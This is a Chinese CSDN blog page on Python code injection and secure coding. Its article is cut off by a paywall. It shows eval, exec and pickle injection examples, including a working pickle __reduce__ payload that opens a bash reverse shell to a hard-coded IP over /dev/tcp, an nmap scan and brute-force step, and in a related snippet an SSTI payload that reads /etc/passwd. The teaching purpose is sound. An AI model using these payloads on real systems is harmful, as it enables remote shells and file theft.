Python安全编码 — 代码注入的实践与防范

最新推荐文章于 2024-02-02 09:00:00 发布
最新推荐文章于 2024-02-02 09:00:00 发布
阅读量305 收藏
点赞数
文章标签: python java 安全 编程语言 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/noogel/article/details/122921856
版权
本文探讨了代码注入攻击,特别是Python中的风险,如eval()和exec()函数。介绍了通过nmap扫描发现系统漏洞的过程,以及如何通过安全编码避免代码注入,包括使用ast.literal_eval()替代eval(),安全使用pickle,并强调了提高安全编码意识的重要性。
摘要由CSDN通过智能技术生成

什么是代码注入

代码注入攻击指的是任何允许攻击者在网络应用程序中注入源代码,从而得到解读和执行的方法。

Python中常见代码注入

能够执行一行任意字符串形式代码的eval()函数

eval("__import__('os').system('uname -a')")

能够执行字符串形式代码块的exec()函数

exec("__import__('os').system('uname -a')")

反序列化一个pickled对象时

pickle.loads("cposix\nsystem\np0\n(S'uname -a'\np1\ntp2\nRp3\n.")

执行一个Python文件

execfile("testf.py")

pickle.loads()代码注入

某不安全的用法:

def load_session(self, session_id=None):
    if not session_id:
        session_id = self.gen_session_id()
        session = Session(session_id, self)
    else:
        try:
            data = self.backend.get(session_id)
            if data:
                data = pickle.loads(data)
                assert type(data) == dict
            else:
                data = {}
        except:
            data = {}
        session = Session(session_id, self, data)
return session

注入的代码:

>>> import os
>>> import pickle
>>> class exp(object):
...     def __reduce__(self):
...         s = "/bin/bash -c \"/bin/bash -i > \/dev/tcp/192.168.42.62/12345 0<&1 2>&1 &\""
...         return (os.system, (s,))
...
>>> e = exp()
>>> e
<__main__.exp object at 0x7f734afa8790>
>>> k = pickle.dumps(e)
'cposix\nsystem\np0\n(S\'/bin/bash -c "/bin/bash -i > \\\\/dev/tcp/192.168.42.62/12345 0<&1 2>&1 &"\'\np1\ntp2\nRp3\n.'
 
>>> pickle.loads(k)
0
>>>
[3]+  Stopped                 python

这些函数使用不当都很危险

os.system

os.popen*

os.spawn*

os.exec*

os.open

os.popen*

commands.*

subprocess.popen

popen2.*

一次模拟的实践

通过这次实践发现系统中的诸多安全薄弱的环节,执行流程如下:

  1. nmap扫描公网IPnmap -v -A *.*.*.* -p 1-65535,通过nmap扫描后会发现公开的服务。扫描关键信息见附录。
  2. 暴力破解登录名密码test 12
最低0.47元/天 解锁文章
知一杂谈
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Python-pyrasite是用于将任意代码注入运行的Python进程的工具
08-10
pyrasite 是用于将任意代码注入运行的 Python 进程的工具。依赖gdb 7.3 。
python注入_Python安全编码代码注入实践防范
weixin_39626298的博客
12-04 766
什么是代码注入代码注入攻击指的是任何允许攻击者在网络应用程序中注入代码,从而得到解读和执行的方法。Python中常见代码注入能够执行一行任意字符串形式代码的eval()函数eval("__import__('os').system('uname -a')")能够执行字符串形式代码块的exec()函数exec("__import__('os').system('uname -a')")反序列化一个...
python渗透测试入门之代码注入
ailx10
06-28 1832
近期收到了电子工业出版社赠送的一本网络安全书籍《python黑帽子》,书中一共24个实验,今天复现第23个实验( 代码注入),我的测试环境是windows10虚拟机(64位)+conda开发环境+python3.7,这个实验是基于模拟受害服务程序,直接能够弹一个shell出来,如果不基于模拟受害服务程序,双击vbs文件也能达到相同的效果,还有一点需要注意的是下载增强版的nc哦,否则无法反弹shel...
Python的高级用法:代码注入
weixin_49520696的博客
11-03 906
Python中的代码注入是一个高级技术,通常指在运行时动态地向程序中引入和执行新的代码片段。虽然这种技术在某些场景下很有用,但它也带来了安全风险,因为恶意代码可以通过这种方式被注入到程序中。
python内存注入代码_Python模板注入
weixin_39974223的博客
12-09 392
Python模板注入近期遇到Python模板注入问题,故在此整理,便于后期回顾。1 什么是“模板注入”首先什么是“Python模板”呢?Python有很多模板引擎可以帮助我们构建完善的Web应用程序。这里将要讨论的就是jinja2。而“模板注入”就是在模板中注入特定的代码,这里的模板可能是文件,也可能是字符串。2 简单的例子在Jinja2中,使用{%...%}执行for循环或赋值语句,使用{{.....
Python技术使用注意事项与错误防范.docx
07-30
1. **良好的代码风格**:遵循PEP8(Python编码风格指南)是非常重要的,它不仅能够提高代码的可读性,还能够让其他开发者更容易理解和维护代码。 - **示例**:例如,使用空格而非制表符进行缩进;确保函数名和变量...
Python-KnowledgeBase慢雾安全团队知识库
08-10
- 安全编码规范:提供Python安全编码的最佳实践,如使用安全库、避免代码注入、正确处理异常等。 - 审计技巧:分享有效的代码审查技巧和方法,以发现潜在的安全隐患。 - 应急响应:指导如何在安全事件发生时迅速...
Python技术安全使用指南.docx
07-30
1. **代码注入防范**:代码注入是常见的安全漏洞之一,通常发生在程序未能正确处理用户输入时。为了避免这种情况,开发者应始终验证并过滤用户输入,防止恶意代码的执行。此外,避免使用动态执行字符串(如`eval()`...
Python-CSGORadarhackwritteninpython
08-10
此外,Python的struct库可能用于解码和编码二进制数据,以匹配CS:GO的数据格式。 在实施雷达黑客时,开发者可能采用了以下步骤: 1. **数据包捕获**:使用Python的socket库创建一个套接字,监听并捕获游戏客户端与...
vulpy:易受攻击的Python应用程序以学习安全开发
02-05
7. **安全编码规范与最佳实践** 掌握OWASP Top Ten等安全标准,遵循安全编码的最佳实践,如最小权限原则、加密敏感数据、使用安全的库和框架版本等,都是保障Web应用安全的重要环节。 通过深入学习和实践`vulpy`...
Python 元类探秘】之五:代码注入的策略✨
最新发布
苟日新,日日新,又日新!!!
02-02 227
通过代码注入,我们可以在不改变原有业务逻辑的情况下,为程序增加额外的功能。 可以用来自动增强类的功能,如添加监控、调试和其他跨切面的特性。
Python微信机器人】第二篇:将python注入到其他进程
Qwertyuiop2016的博客
10-23 628
完整代码这里就不放了,想了解的可以看后面的github。,不过测试下来局限性很大,首先是调用远程函数的API是CreateRemoteThread,它只支持调用的函数传递一个参数,虽然可以是结构体,但是Python构造结构体也不方便,然后是代码比较繁琐,所以还是自己研究了。这里有个特别无语的坑,freopen函数无法在Debug模式下生效,也就是说如果你dll编译成Debug的话,能打开终端,但是看不到Python输出和交互式终端,为此我还谷歌了搜了一天,以为是freopen没效果。
python注入『旁门左道』
mouce的专栏
04-30 522
 今天遇上这样一个需求IG对象需要做一个加密,但是不可以自己做,必须用FG对象做,通常的方法是在IG的初始化中把加密委托给FG,但又不想让在IG中去做这个委托。在另一个地方,IG是给AG用的,于是我选择在把IG传给AG后去做这个委托,使用了lambda来做这个委托。这时候必须把一个方法注入到一个IG对象中,很好玩的好几种语法def __init__(self,b):##        
.py 模板注入
asd5201300的博客
02-14 129
python模板注入 payload {{[].__class__.__base__.__subclasses__()[40]('/etc/passwd').read() }} [].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].__dict__.values()[12].popen('ls'...
python注入_Python如何考虑代码注入安全
weixin_39636079的博客
12-04 152
使用ast.literal_eval(), 只允许使用 string,bytes,number,tuples,lists,discts,set,booleans,Noneast.literal_eval(node_or_string)Safely evaluate an expression node or a string containing a Python literal or conta...
通过or注入py脚本
weixin_30693183的博客
06-20 92
代码思路 1.主要还是参考了别人的代码,确实自己写的和别人写的出路很大,主要归咎还是自己代码能力待提高吧。 2.将功能集合成一个函数,然后通过*args这个小技巧去调用。函数的参数不是argv的值,但是*argv的是。也就是如下:    3.还有就是利用了format,因为是POST所有不好直接设置,但是通过format效果就好得多。 1 #!/usr/bin/e...
以下关于python中命令注入_【奇技淫巧】python代码注入
weixin_36372146的博客
02-05 1221
原标题:【奇技淫巧】python代码注入1.限号季,发一下之前的一点笔记写的很浅显希望各位大佬勿喷.在挖掘某专属厂商的时候出现了一个有意思的地方,python代码执行 2.简单的进行验证一下可以发现sleep进行了执行 3.基本确定存在python代码执行漏洞,但是如何利用呢,翻到一篇安全客的文章https://www.anquanke.com/post/id/84891 是一篇翻译的文章 ,简单...
代码注入——汇编编写注代码
weixin_30807779的博客
11-18 745
代码注入——汇编编写注代码 0x00 思路 在准备些汇编代码之前,我们先要理清楚整个调用过程的思路,以及过程中的参数传递过程。我的的目标是在指定的目标程序中注入一个messagebox线程,首先要调用messageBox就需要用到LoadLibrary装入user32库函数。我们还需要GetprocessAddress来取得messagebox的函数地址,取得了messagebox的地址,...
代码注入的三种方法
kisbuddy
08-09 445
来自VC知识库:http://www.vckbase.com/document/viewdoc/?id=1886#Windows_钩子
Python Google编码风格指南与最佳实践
"Python编码风格指南,主要针对Google推荐的编码规范进行介绍,适用于Python开发者遵循的编程习惯和代码整洁性。" 在Python编程中,遵循一定的编码风格是非常重要的,它能够提高代码的可读性和可维护性。Google提供...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值